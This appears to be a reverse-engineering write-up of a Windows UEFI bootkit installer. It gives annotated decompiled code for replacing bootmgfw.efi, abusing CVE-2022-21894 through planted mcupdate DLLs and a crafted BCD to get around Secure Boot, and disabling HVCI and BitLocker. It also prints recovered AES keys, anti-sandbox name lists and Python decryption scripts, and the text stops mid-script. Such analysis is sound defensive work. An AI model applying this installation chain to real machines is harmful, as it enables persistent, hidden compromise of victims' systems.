esp \EFI\Microsoft\Boot\bootmgfw.efi-->重命名为esp \EFI\Microsoft\Boot\winload.efi
如果没有开启Secure_Boot 则直接将bootkit写入esp \EFI\Microsoft\Boot\bootmgfw.efi
当开启Secure_Boot 后,调用write_file_SecureBoot_140002E50,
bootmgfw.efi替换失败则进行恢复
//esp \EFI\Microsoft\Boot\winload.efi-->重命名为esp \EFI\Microsoft\Boot\bootmgfw.efi
__int64 __fastcall install_bootkit(int is_Secure_Boot)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v2 = 0;
bootkit = 0i64;
esp_nt_path = get_esp_nt_path(); // \EFI\Microsoft\Boot\
out_sz = 0;
esp_nt_path1 = esp_nt_path;
if ( esp_nt_path )
{
// By3h2zWrQxPF9ijYLqMl8ojenCInrWZG
v6 = deobfuscate_bytes(byte_14000A208, 0x21u, 1);
bootkit = aes_256_cbc_decrypt(bootkit_14000D420, v6, 84896u, &out_sz);//bootkit经aes加密
if ( bootkit )
{
if ( out_sz )
{
v7 = esp_bootmgfw_path;
v8 = 0x104i64;
do
{
if ( v8 == 0xFFFFFFFF80000106ui64 )
break;
v9 = *(_WORD *)((char *)v7 + (char *)esp_nt_path1 - (char *)esp_bootmgfw_path);
if ( !v9 )
break;
*(_WORD *)v7 = v9;
v7 = (int *)((char *)v7 + 2);
--v8;
}
while ( v8 );
v10 = (int *)((char *)v7 + 0xFFFFFFFE);
if ( v8 )
v10 = v7;
*(_WORD *)v10 = 0;
// bootmgfw.efi
bootmgfw_efi = deobfuscate_wstring(word_14000A230, 0xDu, 1);
wcsncat((wchar_t *)esp_bootmgfw_path, 0x104ui64, bootmgfw_efi);// esp \EFI\Microsoft\Boot\bootmgfw.efi
v12 = esp_winload_efi;
v13 = 0x104i64;
do
{
if ( v13 == 0xFFFFFFFF80000106ui64 )
break;
v14 = *(wchar_t *)((char *)v12 + (char *)esp_nt_path1 - (char *)esp_winload_efi);
if ( !v14 )
break;
*v12++ = v14;
--v13;
}
while ( v13 );
v15 = v12 + 0xFFFFFFFF;
if ( v13 )
v15 = v12;
*v15 = 0;
// winload.efi
winload_efi_1 = deobfuscate_wstring(word_14000A250, 0xCu, 1);
wcsncat(esp_winload_efi, 0x104ui64, winload_efi_1);// esp \EFI\Microsoft\Boot\winload.efi
if ( (unsigned int)move_file((const WCHAR *)esp_bootmgfw_path, esp_winload_efi) )// esp \EFI\Microsoft\Boot\bootmgfw.efi-->重命名为esp \EFI\Microsoft\Boot\winload.efi
{
v17 = is_Secure_Boot ? write_file_SecureBoot_140002E50((const WCHAR *)esp_bootmgfw_path, bootkit, out_sz) : write_file((const WCHAR *)esp_bootmgfw_path, bootkit, out_sz);
v2 = v17;
disable_hvci_via_registry_edit();
bitlocker_disable_for_all_volumes();
if ( v2 )
goto LABEL_22;
}
}
}
}
move_file(esp_winload_efi, (const wchar_t *)esp_bootmgfw_path);//write_file_SecureBoot_140002E50失败则恢复bootmgfw.efi
//esp \EFI\Microsoft\Boot\winload.efi-->重命名为esp \EFI\Microsoft\Boot\bootmgfw.efi
if ( bootkit )
LABEL_22:
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, bootkit);
if ( esp_nt_path1 )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, esp_nt_path1);
return v2;
}
write_file_SecureBoot_140002E50
-
bootkit -->写入 esp \EFI\Microsoft\Boot\grubx64.efi
-
首次启动,创建 ESP:/system32/时
- Legitimate Microsoft-signed shim binary写入esp \EFI\Microsoft\Boot\bootload.efi
- official_bootmgfw_data 写入esp \EFI\Microsoft\Boot\bootmgfw.efi
- hvloader_dataesp写入 \system32\hvloader.efi
- official_bootmgr_data写入esp \system32\bootmgr.efi
- bcd_exp_data写入esp \system32\BCD
- CVE-2022-21894_payload写入 esp \system32\mcupdate_AuthenticAMD.dll
- CVE-2022-21894_payload写入esp \system32\mcupdate_GenuineIntel.dll
- 备份BCD到 esp \EFI\Microsoft\Boot\BCDR
- bcd_setup0_dataesp 写入\EFI\Microsoft\Boot\tmp,设置为\Registry\Machine\BCD00000000
-
已存在,打开esp \system32\ ,即再次启动此安装程序时
- Legitimate Microsoft-signed shim binary 写入esp \EFI\Microsoft\Boot\bootmgfw.efi,返回
_BOOL8 __fastcall write_file_SecureBoot_140002E50(
const WCHAR *esp_bootmgfw_path,
void *bootkit_data,
ULONG bootkit_size)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
FileHandle = 0i64;
bootload_data = 0i64;
official_bootmgfw_data = 0i64;
official_bootmgr_data = 0i64;
hvloader_data = 0i64;
length = 0;
isSuccess = 0;
v81 = 0;
bcd_setup0_data = 0i64;
v83 = 0;
mcupdate_data = 0i64;
v82 = 0;
pcbOutput = 0;
v84 = 0;
v80 = 0;
memset_140001000(tmp, 0, sizeof(tmp));
memset_140001000(esp_system, 0, sizeof(esp_system));
memset_140001000(BCDR, 0, sizeof(BCDR));
memset_140001000(esp_tmp, 0, sizeof(esp_tmp));
memset_140001000(bcd_reg, 0, sizeof(bcd_reg));
esp_boot_path = get_esp_boot_path();
if ( esp_boot_path )
{
v10 = esp_system;
v11 = 0x104i64;
do
{
if ( v11 == 0xFFFFFFFF80000106ui64 )
break;
v12 = *(wchar_t *)((char *)v10 + (char *)esp_boot_path - (char *)esp_system);
if ( !v12 )
break;
*v10++ = v12;
--v11;
}
while ( v11 );
v13 = v10 + 0xFFFFFFFF;
if ( v11 )
v13 = v10;
*v13 = 0;
esp_system[(unsigned int)wcslen_1400058DC(esp_system) - 19] = 0;// \EFI\Microsoft\Boot\ len 20
// system32\
v14 = deobfuscate_wstring(word_140009F08, 0xAu, 1);
wcsncat(esp_system, 0x104ui64, v14); // \system32\
// \Registry\Machine\BCD00000000
v15 = deobfuscate_wstring(word_140009F20, 0x1Eu, 1);
v16 = bcd_reg;
v17 = (char *)v15 - (char *)bcd_reg;
v18 = 0x104i64;
do
{
if ( v18 == 0xFFFFFFFF80000106ui64 )
break;
v19 = *(wchar_t *)((char *)v16 + v17);
if ( !v19 )
break;
*v16++ = v19;
--v18;
}
while ( v18 );
v20 = v18 == 0;
v21 = v16 + 0xFFFFFFFF;
v22 = 0x104i64;
if ( !v20 )
v21 = v16;
v23 = tmp;
*v21 = 0;
v24 = (char *)esp_boot_path - (char *)tmp;
do
{
if ( v22 == 0xFFFFFFFF80000106ui64 )
break;
esp_path = *(wchar_t *)((char *)v23 + v24);
if ( !esp_path )
break;
*v23++ = esp_path;
--v22;
}
while ( v22 );
v26 = v23 + 0xFFFFFFFF;
if ( v22 )
v26 = v23;
*v26 = 0;
// grubx64.efi
grubx64_efi = deobfuscate_wstring(word_140009F60, 0xCu, 1);
wcsncat(tmp, 260ui64, grubx64_efi);
// bootkit -->写入 esp \EFI\Microsoft\Boot\grubx64.efi
if ( !write_file(tmp, bootkit_data, bootkit_size) )// write bootkit
goto LABEL_92;
RtlInitUnicodeString_14026B000(v92, esp_system);
ObjectAttributes.Length = 0x30;
ObjectAttributes.RootDirectory = 0i64;
ObjectAttributes.Attributes = 0x40;
ObjectAttributes.ObjectName = (PUNICODE_STRING)v92;
*(_OWORD *)&ObjectAttributes.SecurityDescriptor = 0i64;
// 创建/打开ESP:/system32/
if ( NtCreateFile(
&FileHandle,
0x120116u,
&ObjectAttributes,
&IoStatusBlock,
0i64,
FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ,
FILE_OPEN_IF,
1u,
0i64,
0) < 0 )
goto LABEL_92;
// 6jxkPUHKRK5rgdg0PkhLhuS844uMYgrm
v28 = deobfuscate_bytes(lzms_key_140009F80, 0x21u, 1);
// Legitimate Microsoft-signed shim binary
if ( !(unsigned int)decompress_crypted_lzms(
shim_140021FC0,
0x51520u,
v28,
(__int64 *)&bootload_data,
(int *)&length) )
goto LABEL_92;
if ( IoStatusBlock.Information == 1 ) // FILE_OPENED
{ // 已存在esp \system32\,即第二次启动时,
// 将shim替换esp \EFI\Microsoft\Boot\bootmgfw.efi,返回
// Legitimate Microsoft-signed shim binary -->写入esp \EFI\Microsoft\Boot\bootmgfw.efi
if ( write_file(esp_bootmgfw_path, bootload_data, length) )
{
isSuccess = 1;
bcd_exp_data = 0i64;
goto END;
}
goto LABEL_92;
}
if ( IoStatusBlock.Information != FILE_CREATED// 首次运行,创建ESP:/system32/
|| (v30 = deobfuscate_bytes(lzms_key_140009F80, 0x21u, 1),
!(unsigned int)decompress_crypted_lzms(
official_bootmgfw_14007CAA0,
0xBBB60u,
v30,
(__int64 *)&official_bootmgfw_data,
(int *)&v81))
|| (v31 = deobfuscate_bytes(lzms_key_140009F80, 0x21u, 1),
!(unsigned int)decompress_crypted_lzms(
official_bootmgr_140138600,
0xBA950u,
v31,
(__int64 *)&official_bootmgr_data,
(int *)&v83))
|| (v32 = deobfuscate_bytes(lzms_key_140009F80, 0x21u, 1),
!(unsigned int)decompress_crypted_lzms(
hvloader_1401F2F50,
0x75570u,
v32,
(__int64 *)&hvloader_data,
(int *)&v82))
|| (v33 = deobfuscate_bytes(lzms_key_140009F80, 0x21u, 1),
(bcd_setup0_data = aes_256_cbc_decrypt(bcd_setup0_140075A80, v33, 0x3010u, &pcbOutput)) == 0i64) )
{
LABEL_92:
bcd_exp_data = 0i64;
goto LABEL_93;
}
v34 = deobfuscate_bytes(lzms_key_140009F80, 0x21u, 1);
bcd_exp_data = aes_256_cbc_decrypt(bcd_exp_140078A90, v34, 0x4010u, &v84);
if ( !bcd_exp_data )
{
LABEL_93:
isSuccess = 0;
goto END;
}
v35 = deobfuscate_bytes(lzms_key_140009F80, 0x21u, 1);
mcupdate_data = aes_256_cbc_decrypt(mcupdate_1400734E0, v35, 0x25A0u, &v80);
if ( !mcupdate_data )
goto LABEL_114;
// I have a question for you
deobfuscate_wstring(word_140009FA8, 0x1Au, 1);
memset_140001000(tmp, 0, sizeof(tmp));
v36 = 0x104i64;
v37 = tmp;
do
{
if ( v36 == 0xFFFFFFFF80000106ui64 )
break;
v38 = *(wchar_t *)((char *)v37 + v24);
if ( !v38 )
break;
*v37++ = v38;
--v36;
}
while ( v36 );
v39 = v37 + 0xFFFFFFFF;
if ( v36 )
v39 = v37;
*v39 = 0;
// bootload.efi
v40 = deobfuscate_wstring(word_140009FE0, 0xDu, 1);
wcsncat(tmp, 0x104ui64, v40); // \EFI\Microsoft\Boot\bootload.efi
if ( !write_file(tmp, bootload_data, length) || !write_file(esp_bootmgfw_path, official_bootmgfw_data, v81) )// shim 写入esp \EFI\Microsoft\Boot\bootload.efi
// official_bootmgfw_data 写入esp \EFI\Microsoft\Boot\bootmgfw.efi
goto LABEL_114;
memset_140001000(tmp, 0, sizeof(tmp));
v41 = 0x104i64;
v42 = tmp;
do
{
if ( v41 == 0xFFFFFFFF80000106ui64 )
break;
v43 = v42[0x108]; // esp \system32\
if ( !v43 )
break;
*v42++ = v43;
--v41;
}
while ( v41 );
v44 = v42 + 0xFFFFFFFF;
if ( v41 )
v44 = v42;
*v44 = 0;
// hvloader.efi
v45 = deobfuscate_wstring(word_14000A000, 0xDu, 1);
wcsncat(tmp, 0x104ui64, v45); // esp \system32\hvloader.efi
if ( !write_file(tmp, hvloader_data, v82) ) // hvloader_dataesp写入 \system32\hvloader.efi
goto LABEL_114;
memset_140001000(tmp, 0, sizeof(tmp));
v46 = 0x104i64;
v47 = tmp;
do
{
if ( v46 == 0xFFFFFFFF80000106ui64 )
break;
v48 = v47[0x108]; // esp \system32\
if ( !v48 )
break;
*v47++ = v48;
--v46;
}
while ( v46 );
v49 = v47 + 0xFFFFFFFF;
if ( v46 )
v49 = v47;
*v49 = 0;
// bootmgr.efi
v50 = deobfuscate_wstring(word_14000A020, 0xCu, 1);
wcsncat(tmp, 0x104ui64, v50); // esp \system32\bootmgr.efi
if ( !write_file(tmp, official_bootmgr_data, v83) )// official_bootmgr_data写入esp \system32\bootmgr.efi
goto LABEL_114;
memset_140001000(tmp, 0, sizeof(tmp));
v51 = 0x104i64;
v52 = tmp;
do
{
if ( v51 == 0xFFFFFFFF80000106ui64 )
break;
v53 = v52[0x108];
if ( !v53 )
break;
*v52++ = v53;
--v51;
}
while ( v51 );
v54 = v52 + 0xFFFFFFFF;
if ( v51 )
v54 = v52;
*v54 = 0;
// BCD
v55 = deobfuscate_wstring(word_14000A040, 4u, 1);
wcsncat(tmp, 0x104ui64, v55); // esp \system32\BCD
// Windows Boot Manager
// --------------------
// identifier {9dea862c-5cdd-4e70-acc1-f32b344d4795}
// description Windows Boot Manager
// locale en-US
// inherit {7ea2e1ac-2e61-4728-aaa3-896d9d0a9f0e}
// bootdebug Yes
// displayorder {57e1b615-0355-11ec-abb0-005056c00008}
// timeout 30
// Windows Boot Loader
// -------------------
// identifier {57e1b615-0355-11ec-abb0-005056c00008}
// device boot
// path \system32\hvloader.efi
// description Hoy la disco se flota
// locale en-US
// inherit {6efb52bf-1766-41db-a6b3-0ee5eff72bd7}
// truncatememory 0x10000000
// avoidlowmemory 0x1000
// nointegritychecks Yes
// testsigning Yes
// isolatedcontext Yes
// osdevice boot
// systemroot \
// ems Yes
if ( !write_file(tmp, bcd_exp_data, v84) ) // bcd_exp_data写入esp \system32\BCD
goto LABEL_114;
memset_140001000(tmp, 0, sizeof(tmp));
v56 = 0x104i64;
v57 = tmp;
do
{
if ( v56 == 0xFFFFFFFF80000106ui64 )
break;
v58 = v57[0x108];
if ( !v58 )
break;
*v57++ = v58;
--v56;
}
while ( v56 );
v59 = v57 + 0xFFFFFFFF;
if ( v56 )
v59 = v57;
*v59 = 0;
// mcupdate_AuthenticAMD.dll
v60 = deobfuscate_wstring(word_14000A050, 0x1Au, 1);
wcsncat(tmp, 0x104ui64, v60); // esp \system32\mcupdate_AuthenticAMD.dll
if ( !write_file(tmp, mcupdate_data, v80) )
goto LABEL_114;
memset_140001000(tmp, 0, sizeof(tmp));
v61 = 0x104i64;
v62 = tmp;
do
{
if ( v61 == 0xFFFFFFFF80000106ui64 )
break;
v63 = v62[0x108];
if ( !v63 )
break;
*v62++ = v63;
--v61;
}
while ( v61 );
v64 = v62 + 0xFFFFFFFF;
if ( v61 )
v64 = v62;
*v64 = 0;
// mcupdate_GenuineIntel.dll
v65 = deobfuscate_wstring(word_14000A088, 0x1Au, 1);
wcsncat(tmp, 0x104ui64, v65);
if ( !write_file(tmp, mcupdate_data, v80) ) // esp \system32\mcupdate_GenuineIntel.dll
goto LABEL_114;
// SeBackupPrivilege
v66 = deobfuscate_wstring(word_14000A0C0, 0x12u, 1);
if ( !(unsigned int)obtain_privilege(v66) )
goto LABEL_114;
// do you think even the worst person can change?
deobfuscate_wstring(word_14000A0F0, 0x2Fu, 1);
// that everybody can be a good person, if they just try?
deobfuscate_wstring(word_14000A150, 0x37u, 1);
v67 = BCDR;
v68 = 0x104i64;
do
{
if ( v68 == 0xFFFFFFFF80000106ui64 )
break;
v69 = *(wchar_t *)((char *)v67 + (char *)esp_boot_path - (char *)BCDR);
if ( !v69 )
break;
*v67++ = v69;
--v68;
}
while ( v68 );
v70 = v67 + 0xFFFFFFFF;
if ( v68 )
v70 = v67;
*v70 = 0;
// BCDR
v71 = deobfuscate_wstring(word_14000A1C0, 5u, 1);
wcsncat(BCDR, 0x104ui64, v71);
// \Registry\Machine\BCD00000000
// 备份BCD到\EFI\Microsoft\Boot\BCDR
if ( (unsigned int)savekey_140006964(BCDR, bcd_reg)
// SeRestorePrivilege
&& (v72 = deobfuscate_wstring(word_14000A1D0, 0x13u, 1), (unsigned int)obtain_privilege(v72)) )
{
v73 = esp_tmp;
v74 = 0x104i64;
do
{
if ( v74 == 0xFFFFFFFF80000106ui64 )
break;
v75 = *(wchar_t *)((char *)v73 + (char *)esp_boot_path - (char *)esp_tmp);
if ( !v75 )
break;
*v73++ = v75;
--v74;
}
while ( v74 );
v76 = v73 + 0xFFFFFFFF;
if ( v74 )
v76 = v73;
*v76 = 0;
// tmp
v77 = deobfuscate_wstring(word_14000A1F8, 4u, 1);
wcsncat(esp_tmp, 0x104ui64, v77); // \EFI\Microsoft\Boot\tmp
// Windows Boot Manager
// --------------------
// identifier {9dea862c-5cdd-4e70-acc1-f32b344d4795}
// description Windows Boot Manager
// locale en-US
// inherit {7ea2e1ac-2e61-4728-aaa3-896d9d0a9f0e}
// bootdebug No
// displayorder {527f84fc-036e-11ec-abb0-005056c00008}
// timeout 30
// Windows Boot Loader
// -------------------
// identifier {527f84fc-036e-11ec-abb0-005056c00008}
// device boot
// path \system32\bootmgr.efi
// description RIP the woo
// locale en-US
// inherit {6efb52bf-1766-41db-a6b3-0ee5eff72bd7}
// avoidlowmemory 0x10000000
// bootdebug No
// isolatedcontext Yes
// custom:22000023 \system32\bcd
// ems Yes
isSuccess = write_to_registry((__int64)esp_tmp, bcd_reg, bcd_setup0_data, pcbOutput) != 0;// bcd_setup0_dataesp 写入\EFI\Microsoft\Boot\tmp
}
else
{
LABEL_114:
isSuccess = 0;
}
}
else
{
bcd_exp_data = 0i64;
}
END:
if ( FileHandle )
NtClose(FileHandle);
if ( mcupdate_data )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, mcupdate_data);
if ( bcd_exp_data )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, bcd_exp_data);
if ( bcd_setup0_data )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, bcd_setup0_data);
if ( official_bootmgfw_data )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, official_bootmgfw_data);
if ( official_bootmgr_data )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, official_bootmgr_data);
if ( hvloader_data )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, hvloader_data);
if ( bootload_data )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, bootload_data);
if ( esp_boot_path )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, esp_boot_path);
return isSuccess;
}
加解密相关函数
deobfuscate_bytes
BYTE *__fastcall deobfuscate_bytes(BYTE *a1, unsigned int a2, int a3)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v3 = 0i64;
if ( a2 >= 2 )
{
if ( a3 )
{
tablebase_14026A440.sbuf_offset = 0;
memset_140001000(tablebase_14026A440.sbuf, 0, sizeof(tablebase_14026A440.sbuf));
}
v6 = a2 - 1;
v7 = a1[v6];
v3 = &tablebase_14026A440.sbuf[tablebase_14026A440.sbuf_offset];
v8 = v7 - 0x60;
if ( v7 <= 0x7Fu )
v8 = a1[v6];
v9 = 0;
*((_BYTE *)&tablebase_14026A440.wsbuf[999] + a2 + tablebase_14026A440.sbuf_offset + 1) = v8;
do
{
v10 = a2 + tablebase_14026A440.sbuf_offset - v9;
v11 = a1[a2 - v9 - 1];
v12 = v11 - 0x60;
if ( v11 <= 0x7Fu )
v12 = a1[a2 - v9 - 1];
++v9;
tablebase_14026A440.sbuf[(unsigned int)(v10 - 1)] = tablebase_14026A440.sbuf[v10] ^ v12;
}
while ( v9 < a2 );
v13 = 0;
if ( a2 != 1 )
{
do
{
v14 = v13 + tablebase_14026A440.sbuf_offset;
v15 = tablebase_14026A440.sbuf[v14];
tablebase_14026A440.sbuf[v14] = tablebase_14026A440.sbuf[(unsigned int)(v14 + 1)];
v16 = v13 + tablebase_14026A440.sbuf_offset + 1;
v13 += 2;
tablebase_14026A440.sbuf[v16] = v15;
}
while ( v13 < (unsigned int)v6 );
}
for ( i = 0; i < a2 >> 1; *((_BYTE *)&tablebase_14026A440.wsbuf[999] + a2 + v19 + 1) = v18 )
{
v18 = tablebase_14026A440.sbuf[tablebase_14026A440.sbuf_offset + i];
tablebase_14026A440.sbuf[tablebase_14026A440.sbuf_offset + i] = *((_BYTE *)&tablebase_14026A440.wsbuf[0x3E7]
+ tablebase_14026A440.sbuf_offset
- i
+ a2
+ 1);
v19 = tablebase_14026A440.sbuf_offset - i++;
}
*((_BYTE *)&tablebase_14026A440.wsbuf[999] + a2 + tablebase_14026A440.sbuf_offset + 1) = 0;
tablebase_14026A440.sbuf_offset += a2;
}
return v3;
}
deobfuscate_wstring
WORD *__fastcall deobfuscate_wstring(WORD *ws, unsigned int wslen, int isNew)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
outptr = 0i64;
if ( wslen >= 2 )
{
if ( isNew )
{
tablebase_14026A440.wsbuf_offset = 0;
memset_140001000(tablebase_14026A440.wsbuf, 0, sizeof(tablebase_14026A440.wsbuf));
}
end_index = wslen - 1;
end = ws[end_index] - 0x60;
v8 = 0;
outptr = &tablebase_14026A440.wsbuf[tablebase_14026A440.wsbuf_offset];
if ( ws[end_index] <= 0x7Fu )
end = ws[end_index];
tablebase_14026A440.wsbuf[wslen - 1 + tablebase_14026A440.wsbuf_offset] = end;
do // 倒序异或
{
rindex = wslen + tablebase_14026A440.wsbuf_offset - v8;
v10 = ws[wslen - v8 - 1]; // 倒序
rtmp = v10 - 0x60;
if ( v10 <= 0x7Fu )
rtmp = ws[wslen - v8 - 1];
++v8;
// out前一位=out后一位xor in后一位
tablebase_14026A440.wsbuf[(unsigned int)(rindex - 1)] = tablebase_14026A440.wsbuf[rindex] ^ rtmp;
}
while ( v8 < wslen );
v12 = 0;
if ( wslen != 1 )
{
do // 每2个数交换
{
v13 = v12 + tablebase_14026A440.wsbuf_offset;
v14 = tablebase_14026A440.wsbuf[v13];
tablebase_14026A440.wsbuf[v13] = tablebase_14026A440.wsbuf[(unsigned int)(v13 + 1)];
v15 = v12 + tablebase_14026A440.wsbuf_offset + 1;
v12 += 2;
tablebase_14026A440.wsbuf[v15] = v14;
}
while ( v12 < (unsigned int)end_index );
}
// 前后交换
for ( i = 0; i < wslen >> 1; tablebase_14026A440.wsbuf[wslen - 1 + v18] = tmp )
{
tmp = tablebase_14026A440.wsbuf[tablebase_14026A440.wsbuf_offset + i];
tablebase_14026A440.wsbuf[tablebase_14026A440.wsbuf_offset + i] = tablebase_14026A440.wsbuf[tablebase_14026A440.wsbuf_offset
- i
- 1
+ wslen];
v18 = tablebase_14026A440.wsbuf_offset - i++;
}
tablebase_14026A440.wsbuf[wslen - 1 + tablebase_14026A440.wsbuf_offset] = 0;
tablebase_14026A440.wsbuf_offset += wslen;
}
return outptr;
}
aes_256_cbc_decrypt
UCHAR *__fastcall aes_256_cbc_decrypt(UCHAR *pbInput, UCHAR *pbSecret, ULONG cbInput, DWORD *pcbOutput)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v19 = 0i64;
v20 = 0i64;
v18 = 0;
v16 = 0;
v17 = 0;
v8 = 0i64;
v9 = 0i64;
// AES
v10 = deobfuscate_wstring(word_140009010, 4u, 0);
if ( (int)BCryptOpenAlgorithmProvider_14026B0F0(&v19, v10, 0i64, 0i64) >= 0 )
{
// ChainingModeCBC
v11 = deobfuscate_wstring(word_140009020, 0x10u, 0);
// ChainingMode
v12 = deobfuscate_wstring(word_140009048, 0xDu, 0);
if ( (int)BCryptSetProperty_14026B0F8(v19, v12, v11, 0x20i64, 0) >= 0 )
{
// ObjectLength
v13 = deobfuscate_wstring(word_140009068, 0xDu, 0);
if ( (int)BCryptGetProperty_14026B180(v19, v13, &v17, 4i64, &v18, 0) >= 0 )
{
Heap_14026B010 = RtlAllocateHeap_14026B010(NtCurrentPeb()->ProcessHeap, 8i64, v17);
v9 = Heap_14026B010;
if ( Heap_14026B010 )
{
if ( (int)BCryptGenerateSymmetricKey_14026B100(v19, &v20, Heap_14026B010, v17, pbSecret, 0x20, 0) >= 0 )
{
BCryptDecrypt_14026B108(v20, pbInput, cbInput, 0i64, 0i64, 0, 0i64, 0, &v16, 1);
v8 = RtlAllocateHeap_14026B010(NtCurrentPeb()->ProcessHeap, 8i64, v16);
if ( v8 )
{
if ( (int)BCryptDecrypt_14026B108(v20, pbInput, cbInput, 0i64, 0i64, 0, v8, v16, &v16, 1) >= 0 )
*pcbOutput = v16;
}
}
}
}
}
}
if ( v20 )
BCryptDestroyKey_14026B110();
if ( v9 )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, v9);
if ( v19 )
BCryptCloseAlgorithmProvider_14026B118(v19, 0i64);
return (UCHAR *)v8;
}
decompress_crypted_lzms
__int64 __fastcall decompress_crypted_lzms(UCHAR *pbInput, ULONG cbInput, UCHAR *pbSecret, __int64 *a4, int *a5)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v6 = 0;
v13 = 0;
v7 = 0i64;
v14[0] = 0;
v8 = aes_256_cbc_decrypt(pbInput, pbSecret, cbInput, &v13);
v9 = v8;
if ( v8 )
{
if ( v13 )
{
v10 = decompress_lzms((__int64)v8, v13, v14);
v7 = v10;
if ( v10 )
{
v11 = v14[0];
if ( v14[0] )
{
*a4 = v10;
v6 = 1;
*a5 = v11;
}
}
}
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, v9);
if ( v7 && !v6 )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, v7);
}
return v6;
}
py脚本
xor
sbuf = [0 for i in range(1000)]
sbuf_offset = 0
wsbuf = [0 for i in range(1000)]
wsbuf_offset = 0
def doxor(data, size, isnew: bool = True):
global sbuf, sbuf_offset
if isnew:
sbuf_offset = 0
sbuf = [0 for i in range(1000)]
for i in range(size, 0, -1):
t = data[i-1]-0x60
if data[i-1] <= 0x7f:
t = data[i-1]
sbuf[sbuf_offset+i-1] = sbuf[sbuf_offset+i] ^ t
# print(binascii.b2a_hex(bytes(wsbuf[wsbuf_offset:wsbuf_offset+size])))
if size != 1:
for i in range(0, size-1, 2):
t = sbuf[sbuf_offset+i]
sbuf[sbuf_offset+i] = sbuf[sbuf_offset+i+1]
sbuf[sbuf_offset+i+1] = t
# print(binascii.b2a_hex(bytes(wsbuf[wsbuf_offset:wsbuf_offset+size])))
for i in range(size//2):
t = sbuf[sbuf_offset+i]
sbuf[sbuf_offset+i] = sbuf[sbuf_offset+size-1-i]
sbuf[sbuf_offset+size-1-i] = t
sbuf[sbuf_offset+size-1] = 0
# print(binascii.b2a_hex(bytes(sbuf[sbuf_offset:sbuf_offset+size])))
print(bytes(sbuf[sbuf_offset:sbuf_offset+size]).decode())
sbuf_offset += size
calc hash
dlls = [
b"avghookx.dll",
b"avghooka.dll",
b"snxhk.dll",
b"sbiedll.dll",
b"dbghelp.dll",
b"api_log.dll",
b"dir_watch.dll",
b"pstorec.dll",
b"vmcheck.dll",
b"wpespy.dll",
b"cmdvrt64.dll",
b"cmdvrt32.dll",
]
known_file_names = [b"sample.exe",
b"bot.exe",
b"sandbox.exe",
b"malware.exe",
b"test.exe",
b"klavme.exe",
b"myapp.exe",
b"testapp.exe",]
proc_name = [
b'vmsrvc.exe',
b'vmusrvc.exe',
b"vmtoolsd.exe",
b"vmwaretray.exe",
b"vmwareuser.exe",
b"VGAuthService.exe",
b"vmacthlp.exe",
b"VMSrvc.exe",
b"VMUSrvc.exe",
b"qemu-ga.exe",
b"xenservice.exe",
b"prl_cc.exe",
b"prl_tools.exe",
b"vboxservice.exe",
b"vboxtray.exe",
]
def shash(data, size, numb=0x1003F):
tmp = 0
for i in range(size):
tmp = data[i]+numb*tmp
return tmp & 0xffffffff
if __name__ == '__main__':
datas=[dlls,known_file_names,proc_name]
print('calc hash')
for d in datas:
for x in d:
print('%s 0x%08X' % (x.decode(), shash(x, len(x))))
print('#############################################################################\n\n')
dec_aes&dec_lzms
import ctypes as c
from ctypes import wintypes as w
from my_datas import *
from Crypto.Cipher import AES
def dec_aes(encdata, outpath, key):
iv = b'\x00'*16
aes = AES.new(key, AES.MODE_CBC, iv)
dec = aes.decrypt(bytes(encdata))
with open(outpath, 'wb') as f:
f.write(dec)
print('ov')
cabinet = c.WinDLL("cabinet")
CreateDecompressor_name = "CreateDecompressor"
CreateDecompressor = getattr(
cabinet,
CreateDecompressor_name,
)
'''
BOOL CreateDecompressor(
[in] DWORD Algorithm,
[in, optional] PCOMPRESS_ALLOCATION_ROUTINES AllocationRoutines,
[out] PDECOMPRESSOR_HANDLE DecompressorHandle
);
'''
CreateDecompressor.argtypes = [w.DWORD, w.LPVOID, w.LPHANDLE]
CreateDecompressor.restype = w.BOOL
'''
BOOL Decompress(
[in] DECOMPRESSOR_HANDLE DecompressorHandle,
[in] LPCVOID CompressedData,
[in] SIZE_T CompressedDataSize,
[out] PVOID UncompressedBuffer,
[in] SIZE_T UncompressedBufferSize,
[out] PSIZE_T UncompressedDataSize
);
'''
Decompress_name = "Decompress"
Decompress = getattr(
cabinet,
Decompress_name,
)
# Decompress.argtypes = [w.LPHANDLE,w.LPCVOID, w.SIZE,w.LPVOID,w.SIZE,w.PSIZE]
Decompress.restype = w.BOOL
def lzms(data, size):
h = w.HANDLE(0)
b = CreateDecompressor(5, w.LPVOID(0), w.LPHANDLE(h))
c_outsz = w.SIZE(0)
c_data = (c.c_ubyte*size)(*data)
c_sz = w.SIZE(size)
if b:
# b=cabinet.Decompress(h,arg_data ,sz ,0,outsz,c.pointer(outsz))
b = Decompress(h, c_data, c_sz, 0, c_outsz, c.byref(c_outsz))
if b == 0 and c_outsz.cx+c_outsz.cy != 0:
c_outbuf = (c.c_ubyte*(c_outsz.cx+c_outsz.cy))(*
[0 for i in range(c_outsz.cx+c_outsz.cy)])
b = Decompress(h, c_data, c_sz, c_outbuf,
c_outsz, c.byref(c_outsz))
if b != 0:
